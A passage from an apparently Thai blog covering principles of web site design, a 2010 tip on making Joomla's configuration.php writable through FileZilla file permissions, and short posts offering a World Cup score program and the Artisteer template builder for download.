ตาของ Web Site เพียงอย่างเดียว แต่เกี่ยวข้องกับการเริ่มต้นกำหนดเป้าหมายของ Web Site , ระบุกลุ่มผู้ใช้ ,การจัดระบบข้อมูล , การสร้างระบบ Navigation , การออกแบบหน้าWeb , รวมไปถึงการใช้ Graphic , การเลือกใช้สี การจัดรูปแบบตัวอักษร นอกจากนั้นยังต้องคำนึงถึงความแตกต่างของสื่อกลางในการแสดงผล Web Site นั้นด้วย สิ่งเหล่านี้ได้แก่ ชนิดและรุ่นของ Browser ขนาดของหน้าจอมอนิเตอร์ ความละเอียดของสี รวมไป ถึง Plug-in ชนิดต่าง ๆ ที่ผู้ใช้มีอยู่ เพื่อให้ผู้ใช้เกิดความสะดวกและความพอใจที่จะท่องไปใน Web Site นั้น  ดังนั้นทุกสิ่งทุกอย่างใน Web Site ที่มองเห็นและมองไม่เห็นล้วนเป็นผลมาจากกระบวนการออกแบบ Web Site ทั้งสิ้นWeb Site ที่ดูสวยงามหรือมีลูกเล่นมากมายนั้น อาจจะไม่นับเป็นการออกแบบที่ดีก็ได้ ถ้าความสวยงามและลูกเล่นเหล่านั้นไม่เหมาะสมกับลักษณะของ Web Site ด้วยเหตุนี้จึงเป็นเรื่องยากที่จะระบุว่าการออกแบบ Web Site ที่ดีนั้นควรเป็นอย่างไร เนื่องจากไม่มีหลักเกณฑ์ที่แน่นอนที่จะใช้ได้กับทุก Web Site แนวทางการออกแบบบางอย่างที่เหมาะสมกับ Web Site หนึ่งอาจไม่เหมาะกับอีก Web Site หนึ่งก็ได้ ทำให้แนวทางในการออกแบบของแต่ละ Web Site นั้นแตกต่างกันไปตามเป้าหมายและลักษณะของ Web Site นั้น Web Siteบางแห่งอาจต้องการความสนุกสนาน บันเทิง ขณะที่ Web อื่นกลับต้องการความถูกต้อง ความน่าเชื่อถือเป็นหลัก ดังนั้นอาจสรุปได้ว่าการออกแบบที่ดีคือ การออกแบบให้เหมาะสมกับเป้าหมายและลักษณะของ Web Siteโดยคำนึงถึงความสะดวกในการใช้งานของผู้ใช้เป็นหลัก

องค์ประกอบของการออกแบบ Web Site อย่างมีประสิทธิภาพ
ความเรียบง่าย (Simplicity)
ถ้าลองสำรวจ Web Site ของบริษัทใหญ่ ๆ เช่น Adobe , Apple , IBM จะพบว่าWebของบริษัท

เหล่านั้นมีรูปแบบที่เรียบง่าย ไม่ซับซ้อน และใช้งานได้อย่างสะดวก แม้ว่าจะมีข้อมูลใน Web Site นั้นอยู่
มากมาย แต่แทบไม่มีโอกาสเห็น Graphic หรือตัวอักษรที่เคลื่อนไหวอยู่ตลอดเวลา ซึ่งจะรบกวนสายตาและ


สร้างความรำคาญให้แก่ผู้ใช้ ( การใช้ภาพเคลื่อนไหว (Animation ) จะดูหวือหวาและน่าในใจในตอนแรก แต่เมื่อดูบ่อยเข้าและ ตลอดเวลาผู้ใช้จะเริ่มรู้สึกรำคาญได้ ) นอกจากนั้นยังใช้ชนิดและสีของตัวอักษรไม่มากจนเกินไปจนเกิดความสับสน ในส่วนตัวเนื้อหาก็จะใช้ตัวอักษรสีดำบนพื้นสีขาวตามปกติ และไม่มีการเปลี่ยนสีของ Linkให้ลับสนแต่อย่างใด สรูปว่าหลักสำคัญของความเรียบง่ายก็คือ การสื่อเนื้อหาถึงผู้ใช้โดยจำกัดองค์ประกอบเสริมที่เกี่ยวข้องกับการนำเสนอให้เหลือเฉพาะสิ่งที่จำเป็นเท่านั้น

ความสม่ำเสมอ (Consistency)
สามารถสร้างความสม่ำเสมอให้กับ Web Site นั้นได้ โดยใช้รูปแบบเดียวกันตลอดทั้ง Web Site
เนื่องจากผู้ใช้จะรู้สึกเหมือนกับว่า Web Site นั้นเหมือนสถานที่จริง ถ้าลักษณะของแต่ละหน้าใน Web เดียวกันนั้นแตกต่างกันมาก ผู้ใช้จะเกิดความสับสนและไม่แน่ใจว่ากำลังอยู่ใน Web เดิมหรือไม่ ดังนั้นรูปแบบของหน้าระบบ Navigation และโทนสีที่ใช้ควรมีความคล้ายคลึงกันตลอดทั้ง Web Site

ความเป็นเอกลักษณ์ (Identity)
การออกแบบต้องคำนึงถึงลักษณะขององค์กร เนื่องจากรูปแบบของ Web Site สามารถสะท้อนถึงเอกลักษณ์ และลักษณะขององค์กรนั้นได้ Web Site ของธนาคารจึงไม่ควรดูเหมือนกับสวนสนุก การใช้ชุดสี ชนิดตัวอักษรรูปภาพ Graphic จะมีผลต่อรูปแบบของ Web Site อย่างมาก ผู้ออกแบบจึงต้องเลือกใช้องค์ประกอบเหล่านี้อย่างเหมาะสม

เนื้อหาที่มีประโยชน์ (Useful Content)


เนื้อหาถือเป็นสิ่งที่สำคัญที่สุดใน Web Site ดังนั้นใน Web Site ควรจัดเตรียมเนื้อหาและข้อมูลที่ผู้ใช้
ต้องการให้ถูกต้องและสมบูรณ์ โดยมีการปรับปรุงและเพิ่มเติมให้ทันต่อเหตุการณ์อยู่เสมอ เนื้อหาที่สำคัญที่สุดคือ เนื้อหาที่สร้างขึ้นมาเองและไม่ซ้ำกับ Web อื่น ๆ เพราะจะเป็นสิ่งที่ดึงดูดผู้ใช้ให้เข้ามาใน Web Site อยู่เสมอต่างจากที่ Link ไป Web Site อื่น ซึ่งเมื่อผู้ใช้รู้ถึงแหล่งข้อมูลจริง ๆ แล้วก็ไม่จำเป็นต้องกลับมาที่ Link เหล่านั้นอีกระบบ Navigationที่ใช้งานง่าย (User-Friendly-Navigation)
ระบบ Navigation เป็นองค์ประกอบที่สำคัญมากของ Web Site จะออกแบบให้ผู้ใช้เข้าใจได้ง่ายและ
ใช้งานสะดวก โดยใช้ Graphic ที่สื่อความหมายร่วมกับคำอธิบายที่ชัดเจน รวมทั้งมีรูปแบบและลำดับของรายการที่สม่ำเสมอ เช่นวางไว้ในตำแหน่งเดียวกันของทุก ๆ หน้า นอกจากนั้นถ้าใช้ระบบ Navigation แบบGraphic ในส่วนของหน้าแล้ว อาจเพิ่มระบบ Navigation ที่เป็นตัวอักษรไว้ตอนท้ายของหน้า เพื่อช่วยอำนวยความสะดวกกับผู้ที่สั่งBrowserไม่ให้แสดงผลรูป Graphic เพื่อความสะดวกรวดเร็วในการดู

มีลักษณะที่น่าสนใจ (Visual Appeal)

เป็นเรื่องที่ยากที่จะตัดสินใจว่า ลักษณะหน้าตาของ Web Site แห่งใดแห่งหนึ่งนั้นน่าสนใจหรือไม่
เพราะเกี่ยวข้องกับความชอบของแต่ละบุคคล อย่างไรก็ดีหน้าตามของ Web Site จะมีความสัมพันธ์กับคุณภาพขององค์ประกอบต่าง ๆ เช่น คุณภาพของ Graphic ที่จะต้องสมบูรณ์ ไม่มีร่องรอยความเสียหายเป็นจุดด่างหรือมีขอบเป็นบันไดให้เห็น การใช้ชนิดตัวอักษรที่อ่านง่าย สบายตา และการใช้โทนสีที่เข้ากันได้อย่างสวยงาม เป็นต้น

การใช้งานได้อย่างไม่จำกัด (Compatible)
ในการออกแบบ Web Site นั้น จะต้องออกแบบให้คนส่วนใหญ่เข้าถึงได้มากที่สุด โดยไม่มีการบังคับ
ให้ผู้ใช้ต้องติดตั้งโปรแกรมใด ๆ เพิ่มเติม หรือต้องเลือกใช้ Browser ชนิดใดชนิดหนึ่งจึงจะสามารถเข้าถึงเนื้อหาได้ สามารถแสดงผลได้ในทุกระบบปฏิบัติการและที่ความละเอียดหน้าจอต่าง ๆ กันได้อย่างไม่มีปัญหา สิ่งเหล่านี้จะมีความสำคัญมากขึ้น สำหรับ Webที่มีผู้ใช้บริการจำนวนมาก หรือมีกลุ่มเป้าหมายที่หลากหลาย

คุณภาพการออกแบบ (Design Stability)
ถ้าอยากให้ผู้ใช้รู้สึกว่า Web ของมีคุณภาพถูกต้อง และเชื่อถือได้ ก็ควรให้ความสำคัญกับการออกแบบ
Web Site เป็นอย่างมาก เช่นเดียวกันกับสื่อประเภทอื่น ๆ ที่ต้องออกแบบและเรียบเรียงเนื้อหาอย่างรอบคอบ
Web ที่ทำขึ้นมาอย่างลวก ๆ ไม่ได้มาตรฐานการออกแบบและการจัดระบบข้อมูลนั้น เมื่อมีข้อมูลเพิ่มมากขึ้น


เรื่อย ๆ ก็จะเกิดปัญหาและไม่สามารถสร้างความน่าเชื่อถือได้

ระบบการใช้งานที่ถูกต้อง (Functional Stability)

ระบบการทำงานต่าง ๆ ใน Web Site จะต้องมีความแน่นอนและทำหน้าที่ได้อย่างถูกต้อง ตัวอย่างเช่น
ถ้ามีแบบฟอร์มให้ผู้ใช้กรอกข้อมูล ก็ต้องแน่ใจว่าฟอร์มนั้นสามารถใช้งานได้จริง หรืออย่างง่ายที่สุดก็คือ Linkต่างๆ ที่มีอยู่นั้นต้องเชื่อมโยงไปยังหน้าที่มีปรากฏอยู่จริงและถูกต้องด้วย ความรับผิดชอบแรกของคือการทำให้ระบบเหล่านั้นใช้งานได้จริงตั้งแต่หน้าแรกและยังคงต้องคอยตรวจเช็คอยู่เสมอเพื่อให้แน่ใจว่าสิ่งเหล่านั้นยังทำงานได้ดีโดยเฉพาะหน้าที่ Link เชื่อมไปยัง Web อื่นที่อาจมีการเปลี่ยนแปลงได้ตลอดเวลา โดยที่ไม่รู้เรื่อง

วันเสาร์ที่ 12 มิถุนายน พ.ศ. 2553

การแก้ปัญหา configuration.php เขียนลงไฟล์ไม่ได้

       ใครที่ใช้ CMS พวก joomla มักพบกับปัญหา configuration.php เขียนลงไฟล์ไม่ได้ เมื่อติดตั้ง ลงบนโฮสต์จริง พอถึงเวลาจะติดตั้ง ก็จะมีการแจ้งเตือนว่า
configuration.php เขียนลงไฟล์ไม่ได้  คุณ สามารถดำเนินการติดตั้งต่อไปได้ครับ เมื่อเสร็จสิ้นกระบวนการระบบจะแสดงผลค่าตัวแปรต่าง ๆ ที่ควรตั้งค่า ให้คุณเพียง copy แล้วนำไปวางไว้ใน text editor ทำการบันทึกจากนั้นก็อัพโหลดขึ้นเซิร์ฟเวอร์   วิธีแก้ไข้ก็ไม่ยากครับ ทำตามที่เค้าบอก โดยการเขียนไฟล์ configuration .php นำไปวางไว้ที่ root ของ joomla 
      แต่ที่ง่ายกว่านั้นเพียงแค่เปิด ftpของท่าน ยกตัวอย่างที่ผมใช่เป็น  Filezilla  คลิ๊กขวา หน้าต่างทางด้านขวามือ บนโปรแกรม Filezilla ของเรา เลือกที่ file permission จะมีหน้าต่างๆอีกมาใหม่ แก้ไข  permission ของไฟล์ให้เขียนได้ ดังรูป


โปรแกรม อัพเดทผลบอล พร้อมเวลาแข่งบอลโลก

แจกโปรแกรมอัพเดทผลบอลพร้อมตารางแข่งขันบอลโลก พร้อมจัดอันดับให้ด้วย   ลองเอาไปใช้ดูนะครับ สนุกกับบอลโลก  โหลดที่นี้

โปรแกรมสร้าง template joomla artsteer 2.4.0.24559

แจกโปรแกรมสร้าง template ง่ายๆเพียงแค่ห้านาที สามารถสร้างได้หลาย CMS  ทั้ง joomla  wordpress และอื่นๆอีก คุณสมบัติครบเลย ลองเอาไปใช้ดูเจ้าโปรแกรมนี้มีชื่อว่า artsteer  โหลดไปลองใช้งานกันเลย  Artisteer 2.4.0.24559 Multilingual
ลองเอาไปใช้ดูนะครับ สำหรับใครที่อยากมี template เป็นของตัวเอง